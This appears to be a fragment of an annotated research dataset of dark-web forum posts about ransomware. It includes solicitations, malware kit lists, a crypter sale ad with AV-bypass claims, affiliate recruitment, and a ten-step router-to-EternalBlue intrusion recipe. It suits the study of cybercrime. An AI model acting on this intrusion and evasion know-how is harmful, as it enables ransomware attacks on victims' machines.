    <t>hey,;i want to get into the ransomware business.;does somebody have some suggestions how and where to start.;i heard raas is good but i dont have any contacts.;i also bought stampado ransomware years ago but never used it.;idk if it is still functional maybe you got a tip for me.;anyway,thanks for every reply.</t>
  </si>
  <si>
    <t>user want to get into the ransomeware business</t>
  </si>
  <si>
    <t>25/08/2020 12:44</t>
  </si>
  <si>
    <t>c01b751e223197aa1c54</t>
  </si>
  <si>
    <t>Ransomware,RaaS,Stampado</t>
  </si>
  <si>
    <t>8 days 10:35:00</t>
  </si>
  <si>
    <t>http://ranionjgot5cud3p.onion there you go</t>
  </si>
  <si>
    <t>given a url</t>
  </si>
  <si>
    <t>/u/RemyMartin</t>
  </si>
  <si>
    <t>have a method to infect 100-500 machines. this audience is highly trusting and will readily install the software even if flagged by av. this audience will be able to willingly disable av and not suspect anything until everything is encrypted and they see the ransom message. this audience will also have many important files in need of recovery. do not want to discuss details for job security purposes.;;i'm experienced with c++ and java. looking for pointers on where to get modifiable ransomware that i can personalize and compile. willing to split profits if someone wants to help setup and edit the software. can work out details.;;as a side, offering a tip of 10% of my profits to anyone who offers me information leading to success of this project.</t>
  </si>
  <si>
    <t>have plan to hack users, looking for ransomware helper</t>
  </si>
  <si>
    <t>/u/bushlinear</t>
  </si>
  <si>
    <t>30/03/2019 11:14</t>
  </si>
  <si>
    <t>75f1249e731ea8a1f6fd</t>
  </si>
  <si>
    <t>Ransomware: Have strong delivery method need software. Can split profits.</t>
  </si>
  <si>
    <t>18 days 14:35:00</t>
  </si>
  <si>
    <t>u could just find a random one off github and then crypt it. they would probably light up av like a xmas tree but u could crypt it.</t>
  </si>
  <si>
    <t>point out github has some codes</t>
  </si>
  <si>
    <t>31/03/2019 02:45</t>
  </si>
  <si>
    <t>0 days 15:31:00</t>
  </si>
  <si>
    <t>if you are still looking i might be able to help you, i dont know how much service i can be but i can offer a helping hand where i can. contact me on here and ill give you my jabber, or we can set up another way to communicate, i have a shit tone of different ransomware that could be modified and i have a couple sites that have 1000s of modified malware and ransomware. i am actually looking for someone to work with on stuff like this.</t>
  </si>
  <si>
    <t>looking for cooperation</t>
  </si>
  <si>
    <t>/u/d1sgruntl3_reloaded</t>
  </si>
  <si>
    <t>18/04/2019 01:49</t>
  </si>
  <si>
    <t>17 days 23:04:00</t>
  </si>
  <si>
    <t>does anyone know were i could learn ransomware or related hacking skills in that feild;i will put in the time and effort for anyone that teach me anything</t>
  </si>
  <si>
    <t>user looking for where to lear ranmsomware</t>
  </si>
  <si>
    <t>/u/jollyboyjohn15</t>
  </si>
  <si>
    <t>27/08/2022 01:31</t>
  </si>
  <si>
    <t>62ffebe710ab452d9c02</t>
  </si>
  <si>
    <t>Ransomware?</t>
  </si>
  <si>
    <t>0 days 10:25:00</t>
  </si>
  <si>
    <t>/d/hacktown;;/d/cryptbb</t>
  </si>
  <si>
    <t>given some sub-forums</t>
  </si>
  <si>
    <t>27/08/2022 11:56</t>
  </si>
  <si>
    <t>need a partner or someone willing to teach how to use a ransomware. im a usa based middleman send me a pv /message if interested in a middle man for your jobs</t>
  </si>
  <si>
    <t>try to find partnet who can use ransomware</t>
  </si>
  <si>
    <t>/u/raputin007</t>
  </si>
  <si>
    <t>41d9e841b802052f6dc3</t>
  </si>
  <si>
    <t>Ransomware??</t>
  </si>
  <si>
    <t>usa based middleman for ???;im a uk middleman, hacker, researcher, introducer, etc etc lol.;;ransomware is pretty simple if its setup, you can hack lan routers and infect windows machines.;;1. goto shodan search for dgn1000 routers.;2. goto exploitdb look for unauthenticated exploit;3. get admin pass to router.;4. login and check for connected devices.;5. lookup the connected devices on mac address lookup to find computers potentially running windows such as epos, laptops, desktops, servers etc.;6. setup portforwarding to port 135, 443,139 etc.;7. use metasploit eternalblue or other nsa related exploit (if they have not updated) and get a session;9. bypass security using powershell scripts, and then identify backup procedure and important files/folders.;10.download+exec ure ransomware.;;pm me for more info, also let me know what you have available i might be able to shift in uk or through my network.</t>
  </si>
  <si>
    <t>step by step how to hack routers and Windors PC</t>
  </si>
  <si>
    <t>potential hacker (individual) / education (provider)</t>
  </si>
  <si>
    <t>i see vendors selling ransomware packs similiar to this where most ransomwares are 4 or 5 years old like cryptolocker, are they still working and useful or completely useless with up to date operative systems?;;andr0id_l0cker - panel + source;atompayloadbuilder;basiclocker;cryptolocker+ source;eda2;ex0dus;goransomware-master;hiddentear;jigsaw;mylittleransomware;nxransomware - src+panel;shelllocker ransomware;winlocker builderis 0.5#</t>
  </si>
  <si>
    <t>ask whether some listed "old" ransomwares still useful</t>
  </si>
  <si>
    <t>/u/xxxmrxxx</t>
  </si>
  <si>
    <t>21/11/2020 13:04</t>
  </si>
  <si>
    <t>eb260708e938123fc08f</t>
  </si>
  <si>
    <t>Ransomwares - still working?</t>
  </si>
  <si>
    <t>4 days 05:04:00</t>
  </si>
  <si>
    <t>these are the best oldies some are not!;;azorult 3.2.ra;azorult stealer.rar;admin http.zip;agenttesla.rar;anti-av stealer v2.0.rar;anubis.zip;arkei.rar;azorult_3.1.rar;betabot 1.7.rar;betabot 1.8.rar;darksky.rar;diamondfox 4.2.0.650.zip;exobot 2.5 trump.zip;gaudox v1.1.0.1v.zip;ghostlulz_http.rar;godzilla loader.rar;godzilla.zip;h1n1 loader.rar;hvnc.rar;hades stealer.rar;houdini loader 0.6.zip;ice ix 1.2.6.rar;kronos admin panel.rar;litehttp.zip;loki 1.6.zip;loki_2.0.rar;mercury 1.4.zip;n0f1l3.zip;neutrino v5.1.rar;novobot.zip;omeganet.zip;panda banker [builder + panel].rar;panda_bot_panel.rar;plasmahttp.rar;pony 2.2 panel &amp; builder.rar;predatorthethief.zip;project evrial.rar;safeloader 2.0.zip;smoke loader 2013.rar;smoke loader 2017.rar;sos0rry miner.rar;stoned.cat.rar;suprememinerpanel.rar;tinynuke.zip;vertexnet &amp; tutorial.zip;zeus 5.0.0.1.rar;zeus mod 2.9.6.1.rar;zyklon http 1.3.0.1.rar;;;;raas;azorult 3.2* *azorult stealer *admin http;agenttesla *anti-av stealer v2.0 *anubis;*arkei *azorult_3.1;betabot 1.7 *betabot 1.8;darksky *diamondfox 4.2.0.650;exobot 2.5 trump *gaudox v1.1.0.1v;ghostlulz_http *godzilla loader;godzilla *h1n1 loader;hvnc *hades stealer;houdini loader 0.6 *ice ix 1.2.6;kronos admin panel *litehttp;loki 1.6 *loki_2.0;mercury 1.4 *n0f1l3;neutrino v5.1 *novobot;omeganet *panda banker [builder + panel;panda_bot_panel *plasmahttp;pony 2.2 panel &amp; builder /*predatorthethief;project evrial *safeloader 2.0;smoke loader 2013 *smoke loader 2020;sos0rry miner *stoned.cat;suprememinerpanel *tinynuke;vertexnet &amp; tutorial *zeus 5.0.0.1;saaarsr.3.0.1</t>
  </si>
  <si>
    <t>given a list of best oldies ransomwares</t>
  </si>
  <si>
    <t>25/11/2020 08:49</t>
  </si>
  <si>
    <t>3 days 19:45:00</t>
  </si>
  <si>
    <t>just curious if there's any truth to this "intelligence".;;/u/hugbunter;;/u/paris;;;darknet ddoser does damage to dread;;dave bittner:;hello everyone, and welcome to episode 116 of the recorded future podcast. i���m dave bittner from the cyberwire.;;criminal markets on dark web forums are the online version of a bad neighborhood, complete with sellers, buyers, and people who make their living connecting those groups. they tend to be self-policing, and so when an individual discovers a fundamental flaw in the technical foundation of the community and then decides to take advantage of that flaw to hold entire markets for ransom, well that tends to get people���s attention. and it���s a high stakes game.;;daniel byrnes is a senior threat intelligence analyst with recorded future���s insikt group and he found himself on a journey down a dark web rabbit hole to try to make sense of the situation. stay with us.;;daniel byrnes:;there are a few things i hate in this industry and that���s hate with a capital h, and first in line on that list is. they���re the worst. it���s just a bunch of drug dealers and low-level fraudsters. it���s nothing like the high level russian places where you have complicated pieces of banking trojans and ransomware affiliate programs and international organized crime. so every tor dark net market is the same. it���s just a bunch of guys selling a bunch of drugs to a bunch of people who want drugs.;;the unfortunate part about what i do is we need to keep a presence on as many criminal forums as possible. i mean, the goal is all of them so we have complete visibility into everything that goes on, because just because it���s a low level forum, if something big happens, you want to be on it. you can���t go to a client or your boss and say, ���yeah, it was a big giant impactful cyber event. but it wasn���t on a very prestigious forum, so we ignored it.��� that doesn���t fly. so you have got to be everywhere.;;dave bittner:;and so this is sort of the online equivalen just... anyone can use tor, all it requires is a browser. all the criminal marketplaces on tor are pretty much cookie cutter. so it just... it attracts the non-technical crowd. and the non-technical crowd is not interesting for the most part. the dea is all about it. i���m sure they find it very interesting. but from an analyst perspective, it���s kind of an eye roll.;;dave bittner:;and just a quick description for folks who may not be familiar with it. what���s going on with tor?;;daniel byrnes:;so tor really hasn���t changed much. silk road, alpha bay, the real deal. and they used the name dark net, which i���m kind of adopting. so all of the tor miscreants refer to the tor criminal marketplaces hosted on hidden services sites, onion sites, as the dark net. so when i say dark net, that���s specifically what i���m referring to. so the state of the tor dark net marketplace is pretty much where it was way back.;;so you have dream market, which went down, wall street mwhat���s popular now? you still have nightmare market and things like that. they���re all pretty much the same format, and they attract the same buyers, they have automated escrow, you can get any drug known to man, and there���s some also low level technical stuff like people reselling source code that they bought for some ransomware, banking trojan, or bot. you can get your low valid credit cards or cvvs and some of the basic more popular hacker stuff, and your fraud guides for bypassing two factor authentication.;;it���s pretty much the same thing everywhere you go. whereas the russian forums you���ll go to your... i have a few favorite forums. and every time you log in, you never know what you���re going to find. it���s like, ���oh, that���s new and that���s interesting. and this guy���s new and let���s look into... ��� but it���s, yeah, like you said, it���s cookie cutter with the tor criminal dark net sites, unfortket for these illicit items. and so as soon as one goes down, another pops up?;;daniel byrnes:;yeah, i forget where i... this might���ve been on reddit, but there���s one guy he said, and i quote, ���i just want my drugs mate.��� and that sums up the dark net in a nutshell.;;dave bittner:;okay, got it. all right, well, so let���s dig into some of the details of what we���re talking about here specifically.;;daniel byrnes:;back to the very beginning. so we get a request from some person in the company and they want to know about... there���s a newish, newish dark net market. it���s called nightmare market. and some people wanted to know what���s nightmare and what���s it going to be like and who���s migrated over there, because this is around the time dream market went down. so there was a mass exodus and a large collection of people who needed to sell their narcotics and where���s elsewhere? so i���m like, okay, i go to deep.web andn���t load. i���m like, ���okay, that���s unfortunate.��� and then i try the other mirrors, none of it works. i tried to go to the forum, the forum���s down. like okay, i���m going to hop onto some other tor dark net marketplaces and maybe there���s some chatter around this.;;so i think i tried to access empire and then i tried to access wall street. everything was down and i���m like, ���what is going on?��� so then i just jumped and i just start googling it. i���m like, ���why is nightmare down? why is empire down? why is wall street down?��� and i end up on reddit of all places and i didn���t realize reddit was still a popular medium for discussion around the dark net. i know there used to be popular and then it shut down the subreddit, what was it called? it was like dark net markets or something like that. i forget what it was. but reddit shut it down. so they opened a new one and on that new one there was all this  scams.;;but then one gentleman stood out, and this guy is one of my favorite hackers of all time. he is a gentleman and a scholar. he���s well spoken. he uses commas in the right place. his name is hugbunter and hugbunter is the official host of the dark net underworld. he knows everybody, he knows all the admins. he has firsthand access to all the gossip and he operates a tor message board called dread. and dread was also new to me. so i hopped onto dread after discovering hugbunter and there i found my answer.;;and my answer was this little miscreant now called ruskin, who also goes by the moniker hereyougo, also hereyougoagain, when hereyougo was banned. and this gentleman, he, back in i think march, he posted on dread that, ���hey, i���m the guy who took down dream. i���m the guy who���s still attacking dream,��� and everyone���s like, ���yeah, sure, whatever.��� but then he proved it and he���s like, ���i���m going to turn off my dd then he did it and then members started to go, ���oh, this is legitimate.��� and i thought dream was down because... do you remember gnostic player who was releasing all those databases on dream?;;dave bittner:;yep.;;daniel byrnes:;yeah, i thought whenever a big newsworthy thing happens on a dark net forum, everybody rushes to it. you have all the reporters, you have all the researchers, you have all the curious cybercriminals and everyone in between and their mother. so i thought dream was down just because it was getting too much press. little do i know it was being extorted by our friend ruskin or hereyougo, or hereyougoagain.;;he had found a bug or a vulnerability or just a misuse of the circuit building mechanism for tor and how tor handles... how it connects a tor user to a tor hidden service or an onion domain. and with this vulnerability, our friend ruskin was able to, with minimal resources, take down any dark net market site he wanted to. and when i say minimal resources, i mean accordi was a few lines of code and a vps server. and when i say a few lines of code, i mean like hundreds of lines of code, but you know what i mean?;;that was a colloquialism i guess. so he was extorting dream. apparently he wanted a substantial amount of money. the admin of dream, speed stepper, wanted nothing to do with it, refused to pay, and decided to close the market instead of dealing with any of this. so our friend then pivoted to other markets and he was talking about this on dread. the dread admins or the moderators tried to ban him. and when they banned him, they banned his first username, which was, hereyougo. so they banned hereyougo. and what do you think he did? ...;</t>
  </si>
  <si>
    <t>debate about darkweb markets</t>
  </si>
  <si>
    <t>23/07/2020 21:09</t>
  </si>
  <si>
    <t>fa39cb28f4f2a1edc4cf</t>
  </si>
  <si>
    <t>Recent DNM History according to "threat intelligence" agency</t>
  </si>
  <si>
    <t>16 days 07:09:00</t>
  </si>
  <si>
    <t>yup, we're always looking for helpers, even if you're just spreading our malware.;;we most need malware devs and people who can make a secure fake cp site. if you decide to become a malware dev, we'll let you hold the pedo's stuff for ransom and allow you to get 100% of the profits minus server fees (they're around 10-30$ usd per month, since we cover those directly and use xitheon).;;if you do not have malware dev or other it skills, that is fine too. we also need people to test our malware on disposable computers to make sure it works. we will also need people to go into these forums and spread the site malware, but this will be much later on.;;if you are interested, please email me at order_of_the_dawn@secmail.pro</t>
  </si>
  <si>
    <t>looking for helpers</t>
  </si>
  <si>
    <t>/u/Marrow-Sparrow</t>
  </si>
  <si>
    <t>22/04/2021 00:42</t>
  </si>
  <si>
    <t>155cfe55ba636051c1ba</t>
  </si>
  <si>
    <t>Recently found a pedophile ring. Anyone like to help take them down?</t>
  </si>
  <si>
    <t>5 days 16:28:00</t>
  </si>
  <si>
    <t>hello everyone,;;i declare my ransomware project open for business.;feature list, downloads and guide have been published on the subdread.;;for everyone looking for a decent ransomware, i recommend them trying my project, the fee is only 20% and everyone is welcome to use it :)</t>
  </si>
  <si>
    <t>sale ransomware</t>
  </si>
  <si>
    <t>25/05/2021 22:44</t>
  </si>
  <si>
    <t>fd02872e8b26ecda33a5</t>
  </si>
  <si>
    <t>Redeemer - A Ransomware Project on Dread</t>
  </si>
  <si>
    <t>0 days 18:44:00</t>
  </si>
  <si>
    <t>i downloaded it and seem to be getting a error on my computer. can you help me?</t>
  </si>
  <si>
    <t>ask for help (for running ransomware)</t>
  </si>
  <si>
    <t>26/05/2021 17:28</t>
  </si>
  <si>
    <t>hello guys! in the past 4 weeks i have been working on a crypter for redeemer and i've discovered an interesting method to bypass ransomware detection, so i decided to sell the project / create ud builds for the community.;;details about the project:;- native, fully coded in c++17;- /mt, no frameworks or dependencies;- uses a special method to bypass antiviruses' antiransomware detection.;- the selling thread will be closed when a patch will be discovered and the crypter won't work anymore / the source code is bought by someone;;what do i need to get my file crypted?;- after you downloaded the official files from cerebrate's post and followed his instructions, you need to send me the executable you build with his kit (make sure you disable melt) and a name for your application;- (optional) sleep time (how much sleep do you want before payload execution), an icon that will be used for the build (any ".ico" file), file version (ex: "0.0.1.1"), product version (ex: "0.0.1.1"), a file description for your build (ex: "a private messaging app"), a company name (ex: "redeemcrypt"), legal copytight (ex: "copyright (c) 2022") or anything else that can be added to an executable, like an internal name, default language, a comment, etc.;;where to upload my executable?;-  anonfiles is a pretty decent filehost service imo;;prices:;- ud build - $75 - tested only against windows defender - you will share the stub with everyone else who buys this package;- fud build - $150 - tested against best antiviruses, like kaspersky, bitdefender, norton, mcafee, avast, avg, eset and panda - private stub, coded for you;- builder - $300/month - w.i.p. - will come soon;- full project source code - $800;;why is this project so expensive?;- the method is new, fully functional and the project is written cleanly, no messy code, you get no crypt errors. the usual price for a fud build ranges from $30-$100, but the real issue with ransomware builds these days is that they modify (write &amp; delete / rewrite) a lot of files, that action is flagged by a lot of antiviruses, with my native crypter, you don't need to worry anymore.;;how long will my file remain fud?;- i hope this project will keep your files fud at least 1 month, but tbh, if someone uploads the builder / the public stub on virustotal, the ud package will be detected pretty fast.;- private stubs are written totally different, but they're using the same method;;preview:;link - https://anonfiles.com/zfw7ob42y4/redeemcrypt_mp4;video date - 18/08;;detections:;link - https://antiscan.me/scan/new/result?id=85ysr4rn92sq;scan date - 18/08;;explanations:;- why did the cmd pop up after 5 seconds?;execution delay set to 5 seconds, i can change that if you want (everything longer than 3s is accepted);- why did xan.exe's process got detected in the end? how did the ransomware encrypt the files even if wd stopped "xan.exe"?;this is an important part of my method, the process that executed the payload isn't "xan.exe" anyway. i will write a new thread and give more information after the method gets detected.;! if someone bought the source and doesn't want me to explain how it works in depth, i will not post anything. sorry!;;service type:;- file crypting service;;payment options:;- xmr (monero);- btc (bitcoin);;tos:;- no vouch copies;- don't upload the build on virus total / any other scanning services that share the file with avs;- don't share the builder if you bought it, you will get hwid banned;- buying the source code gives you all the rights on this project, i will delete the thread if you want to;;thank you, contact me here on dread or on session if you have any questions.;my session id: 05dc4c9aea53e191c22c900a8572a9e6c5be68f18d4767584b3c759085dec70b63</t>
  </si>
  <si>
    <t>sell ransomware project</t>
  </si>
  <si>
    <t>/u/RedeemCrypt</t>
  </si>
  <si>
    <t>22/08/2022 11:43</t>
  </si>
  <si>
    <t>85c1d68e770e184c61f9</t>
  </si>
  <si>
    <t>Redeemer Crypter (FUD, New Bypass for Ransomware Protection)</t>
  </si>
  <si>
    <t>1 days 18:58:00</t>
  </si>
  <si>
    <t>this is a very interesting post from quite a few aspects.;do your crypted executables require them to be run as admin or do they have some form of uac bypass?;;maybe another idea would be to add some sort of customizable error message which could prove useful in situations where a crypter is required.;;also, since i didn't really code this project, i can't guarantee that it will work as intended for the crypts or be safe in terms of the builder (since it needs to contact a server to verify the hwid), but it seems to be promising.;;did you ever try to decrypt the encrypted computer? does it run redeemer multiple times?;contact me for a free test decryption, just to verify that it works completely.;;edit: also i wanted to say that the crypted executable name goes well in theme :)</t>
  </si>
  <si>
    <t>ask more information about how the project could bypass detection</t>
  </si>
  <si>
    <t>22/08/2022 16:13</t>
  </si>
  <si>
    <t>0 days 04:30:00</t>
  </si>
  <si>
    <t>hello! sorry for the late response!;- currently there is no uac bypass implemented, so you need to run the crypted executable as an administrator.;- i can add customizable error messages.;- the builder isn't done yet, but i would like to host an onion website if the project gets enough attention to verify the hwid, i won't store ips anyway;- i've never tried to decrypt my version, i don't think there should be any issues in the decryption process, but a test decryption would be really useful, thank you!</t>
  </si>
  <si>
    <t>response the previous post about bypass</t>
  </si>
  <si>
    <t>24/08/2022 06:41</t>
  </si>
  <si>
    <t>1 days 14:28:00</t>
  </si>
  <si>
    <t>hello everyone,;;the new redeemer ransomware version has been released.;as always, everyone is free to download it and join as an affiliate.;for more information check out;/d/redeemer;subdread.;;if you have any questions forward them to me, but most things are covered by posts in;/d/redeemer;.;;changelist:;;redeemer version 1.5 - second public version;;;;deletes backup &amp; catalog twice;;this version works with any crypter that supports x86 c++ executables (turn off melt in build options if you're using a crypter);;fixed a bug in key checking process;;keys are now in a new format, which makes them more readable (public, affiliate and master keys);;improved ransom note;;ransom note appears on login screen;;when someone opens encrypted .redeem file, they get a proper message;;more clear error handling when decrypting invalid keys;</t>
  </si>
  <si>
    <t>release new redeermer ransomware</t>
  </si>
  <si>
    <t>b7e68f8b31babc3f9b25</t>
  </si>
  <si>
    <t>Redeemer Ransomware Version 1.5 has been released!</t>
  </si>
  <si>
    <t>4 days 18:48:00</t>
  </si>
  <si>
    <t>;;redeemer ransomware version 1.5 has been released!;;by;/u/cerebrate;���;1 year ago;in;/d/malware;;1 points;���;</t>
  </si>
  <si>
    <t>changelog</t>
  </si>
  <si>
    <t>4f0a76f5d8ddc6058918</t>
  </si>
  <si>
    <t>1 days 15:43:00</t>
  </si>
  <si>
    <t>keep up the good work!;will for sure use it someday.</t>
  </si>
  <si>
    <t>/u/xyn</t>
  </si>
  <si>
    <t>13/09/2021 14:20</t>
  </si>
  <si>
    <t>3 days 21:16:00</t>
  </si>
  <si>
    <t>;;redeemer ransomware version 2.0 has been released!;;by;/u/cerebrate;���;4 months ago;in;/d/redeemer;;4 points;���;</t>
  </si>
  <si>
    <t>30/06/2022 13:49</t>
  </si>
  <si>
    <t>30646fd7c2f626dea82a</t>
  </si>
  <si>
    <t>Redeemer Ransomware Version 2.0 has been released!</t>
  </si>
  <si>
    <t>f32e0dc3eb0ad4bcf551</t>
  </si>
  <si>
    <t>;;redeemer ransomware v1.7 tutorial;;by;/u/cerebrate;���;10 months ago;in;/d/redeemer;;2 points;���;1</t>
  </si>
  <si>
    <t>18/12/2021 16:48</t>
  </si>
  <si>
    <t>4ce32d0cdca441c39a4a</t>
  </si>
  <si>
    <t>Redeemer Ransomware v1.7 Tutorial</t>
  </si>
  <si>
    <t>12cb014fce9a22dd9074</t>
  </si>
  <si>
    <t xml:space="preserve">;cybercriminals are increasingly relying on cryptocurrencies to maximize their gains. via exploiting various forms of vulnerabilities of victims��� internet browsers and operating systems, cryptojacking renders it possible for cybercriminals to hijack victims��� computational resources to illicitly mine cryptocurrencies.;;a recently published research study analyzes current cryptojacking malware via means of dynamic and static methods. the paper also delves into the potential negative impacts of cryptojacking on operating systems, enterprise servers, and critical network infrastructures. throughout this article, we will summarize the analysis presented via this research study.;;;;history of cryptojacking:;;according to the report published by symantec internet security threat report (istr) in 2018, cryptocurrency mining malware scripts on endpoints surged in 2017 by 8500%. consequently, a new act of cybercrime scheme focused on cryptocurrency mining has emerged. during late 2017 and early 2018, th visited politifact.com or msn.com, clicked on a youtube ad or downloaded an app to their android devices may have unintentionally financed cybercriminals. due to its high profitable potential and low barrier of entry, cybercriminals have considerably exploited this emergent attack surface of using cryptocurrency miners to hijack computers��� processing power and cloud cpu usage from users and enterprises to mine various coins.;;between 2016 and 2017, companies such as coinhive, coinimp, coinloot, and deepminer have developed special scripts to embed within website pages that siphon the computational power from visitors��� machines to mine cryptocurrencies. this represented means to support a website in lieu of conventional advertisements. nevertheless, many cybercriminals have seized the opportunity to maliciously embed this coin mining javascript within vulnerable websites and ads. for instance, a search on publicwww.com, a search engine for website source codes, presently shows that there are oebsites including a potentially malicious coin mining script. this script hijacks the computational resources of a visitor���s machine for the duration of time visiting the website in order to mine monero (xmr). it has been proven that this script was embedded onto websites of high-profile companies such as the los angeles times, showtime, and politifact, as well as the mobile device manufacturer blackberry.;;in 2018, another attack that focused on mining monero via the open-source xmrig utility may have reportedly hit more than 30 million systems worldwide. it was proven that attackers utilized the url link shortening service bit.ly to silently install a malware that runs the monero mining client.;;;coin mining malware analysis:;;in order to analyze and formulate a better understanding of cryptojacking malware, authors of the paper obtained malware samples via means of virustotal, which is a publically available service that makes it possible for a user to submit a file or a website url for scanning bythan 70 antivirus programs and url filtering solutions. results of the scan include the antivirus programs which recognized the file or url as being malicious. the top 132 malware samples bearing the cryptocurrency mining tag were obtained and then analyzed via a specially set, safe environment for testing.;;oracle���s virtualbox was utilized by the authors to create a virtual machine (vm) for analyzing the malware samples. using multiple vms can limit outgoing connections and, also, record uninfected configurations. this renders it possible to run potentially malicious code and monitor its behavior, without the risk of infecting the operator���s machine or other devices on the network.;;;static and dynamic analysis methods:;;static analysis aims at observing the features of a malware file. pestudio was utilized, which provides information about a file including its name, imported libraries, its programming language, and other relevant info. dynamic analysis attempts to provoke the malicious behavuting and monitoring the behavior of portable executables (pes). this was accomplished via running two different programs: process monitor and regshot. process monitor records process events and threads in real-time. regshot enables comparison of the registry hive of the windows os before and following execution of a program.;;malware sandboxes were utilized as an alternative means for detection and automation of the process of malware analysis. the hybrid-analysis online service was used, which offers flexibility in the victim���s vulnerable os, as well as the individual parameters of vulnerable machines inside the sandbox. hybrid-analysis submits an executable file to multiple specific engines and generates a report, as shown in figure (1). this malware sandbox was used to validate and present additional contexts for the results obtained via static and dynamic analysis.;;;figure (1):;a sample clear report obtained via hybrid-analysis.com;;cryptojacking attack vectors:;;there are two main forms of attators used in cryptojacking, which are:;;hijacking the internet browser:;;attacks targeting the internet browser can potentially compromise a large number of victims. via embedding a mining script into a website page, the attacker can profit off its popularity. there are many javascript coin miners that can do this, yet the most popular of those is coinhive���s service. to be able to use coinhive���s script, the attacker must create an account and receive a site key. the script includes a throttle that limits the percentage of cpu resources siphoned from victims. according to data present on coinhive���s website, a site owner or a cryptohacker can generate a monthly profit of around 0.3 xmr (around $76) via a single website sustaining between 10 and 20 miners.;;native code attacks:;;this form of attack vector includes malware programmed to run on vulnerable devices including pcs, or online servers. the authors of the paper identified 96 malwares from this category masquerading in the form of ivirus program named 360 security. another 23 malware scripts masqueraded as a nondescript folder which was later recognized to be a worm trojan. another 5 malware scripts seemed to be mining coin outright via victims��� machines.;;malware analysis of all three forms showed that they are all variants of the same malware. it was also shown that the malware disables internet explorer���s security settings. it also modifies the registry to prevent showing hidden folders and files so that the zhudonfangyu.exe file (the mining virus) remains hidden. the virus acts via injecting itself along with coinhive���s script into as many programs and files on the victim���s machine as possible. as such, the victim will execute the script and mine monero for the attacker, as long as they continue using their machine. the virus tends to persist on the target machine and resists removal via disabling the os���s security features.;;malware analysis identified another cryptomining worm from the nati as ���night miner���. this cryptomining worm masquerades itself as an image folder, which prompts the victim to open it to launch its attack routine. this worm is very dangerous as it can spread to networkshares, and connected media, which broadens the scale of the initial infection. once it is executed, it activates a cpu miner that joins mining pools to </t>
  </si>
  <si>
    <t>Analysis of cryptojacking malware</t>
  </si>
  <si>
    <t>d59798a75452db328f83</t>
  </si>
  <si>
    <t>Research: Analysis of cryptojacking malware</t>
  </si>
  <si>
    <t>a research conducted by threat intelligence firm analyst1 unearthed the dark web���s decade-long informal court system for cybercriminal forums;;;the dark web may be considered to be the internet���s wild as far as law and order is concerned because, well, would you expect any class among cybercriminals?;;the general assumption that thieves and perverts lurk in the dark web is not far from the truth as criminals continue to exploit online anonymity tools like tor to obscure their illicit activities.;;in fact, past research points to the fact that the tor network hosted more than 170,000 active addresses that host criminal platforms including child sex abuse communities that continue to endanger the world���s young.;;law enforcement agents note that the main reason why tor became very popular is due to its support of the hidden services. hidden services, also referred to as onion services, ensure that users and websites achieve anonymity by tor.;;having said that, it turns out that the same dare expected to abide to sets of rules and regulations that govern their operations when dealing with other vendors and buyers across the darknet ecosystem.;;findings of a new research conducted by the threat intelligence company analyst1 provided a sneak peek into the dark web���s little-known internal justice system. the study lifted the lid on the workings of notable cybercriminal forums where a number of the analysed websites had an informal court system setup to ensure that dark web criminals share grievances and settle disputes with their peers.;;interesting findings;;according to an analyst1 blog post, the dark web community users adhere to a cybercrime ecosystem that boasts a virtual court feature that works like an insurance element ���in case something will go wrong.���;;it turns out that thousands of cases have been examined and actual verdicts served over the last ten years that cybercriminal communities have been in active operation. the researchers noted that the threat actors nowledge that they will be held accountable in cases where they fail to meet their end of the bargain ��� supplying substandard products and services will result in their aliases being added to the arbitrage thread title.;;cybercriminals who have since lost dark web court cases have had to watch their reputation disintegrate as they are forced to start their career all over again.;;thanks to this system of justice, dark web cybercriminals have been hard at work advocating for accountability from their counterparts in the quest for fair trial whenever disputes arise within the underground networks.;;as cited by analyst1 cybersecurity experts, an april 2021 case involving the notorious conti ransomware group resulted in a $2 million suit concerning a breached agreement about the hacking and encryption of data belonging to a us-based school s</t>
  </si>
  <si>
    <t>Post about the informal justice system the dark web has (includes a ransomware related example)</t>
  </si>
  <si>
    <t>0b711dff60bc81a33f63</t>
  </si>
  <si>
    <t>Research: The Dark Web Has an Internal Justice System</t>
  </si>
  <si>
    <t>5 days 07:48:00</t>
  </si>
  <si>
    <t>cybersecurity researchers are warning of two different information-stealing malware, named ffdroider and lightning stealer, that are capable of siphoning data and launching further attacks.;;"designed to send stolen credentials and cookies to a command &amp; control server, ffdroider disguises itself on victim's machines to look like the instant messaging application 'telegram,'" zscaler threatlabz researchers avinash kumar and niraj shivtarkar said in a report published last week.;;information stealers, as the name implies, are equipped to harvest sensitive information from compromised machines, such as keystrokes, screenshots, files, saved passwords and cookies from web browsers, that are then transmitted to a remote attacker-controlled domain.;;ffdroider is distributed through cracked versions of installers and freeware with the primary objective of stealing cookies and credentials associated with popular social media and e-commerce platforms and using the plundered data to login into the accounts and capture other personal account-related information.;;web browsers targeted by the malware include google chrome, mozilla firefox, internet explorer, and microsoft edge. the websites targeted encompass facebook, instagram, twitter, amazon, ebay, and etsy.;;"the stealer signs into victims' social media platforms using stolen cookies, and extracts account information like facebook ads-manager to run malicious advertisements with stored payment methods and instagram via api to steal personal information," the researchers said.;;ffdroider also comes with a downloader functionality to upgrade itself with new modules from an update server that allows it expand its feature set over time, enabling malicious actors to abuse the stolen data as a vector for initial access to a target.;;lightning stealer operates in a similar fashion in that it can steal discord tokens, data from cryptocurrency wallets, and details pertaining to cookies, passwords, credit cards, and search history from more than 30 firefox and chromium-based browsers, all of which is exfiltrated to a server in json format.;;"info stealers are adopting new techniques to become more evasive," cyble researchers said, adding it "witnessed ransomware groups leveraging info stealers to gain initial network access and, eventually, exfiltrating sensitive data.";;;the development comes as stealer malware is becoming an increasingly common occurrence across different attack campaigns in recent months, in part to fill the void left by raccoon stealer's exit from the market in late march due to the ongoing war in ukraine.;;in february 2022, cyble research disclosed details of an emerging threat called jester stealer that's engineered to steal and transmit login credentials, cookies, credit card information along with data from passwords managers, chat messengers, email clients, crypto wallets, and gaming apps to the attackers.;;since then, at least three different info-stealers have emerged in the wild, including blackguard, mars stealer, and meta, the last of which has been observed delivered via malspam campaigns to collect sensitive data.</t>
  </si>
  <si>
    <t>introduced two information-stealing malware</t>
  </si>
  <si>
    <t>/u/Dwiki</t>
  </si>
  <si>
    <t>0107f939e2c8a5317738</t>
  </si>
  <si>
    <t>Researchers warn of FFDroider and Lightning info-stealers targeting users in the wild</t>
  </si>
  <si>
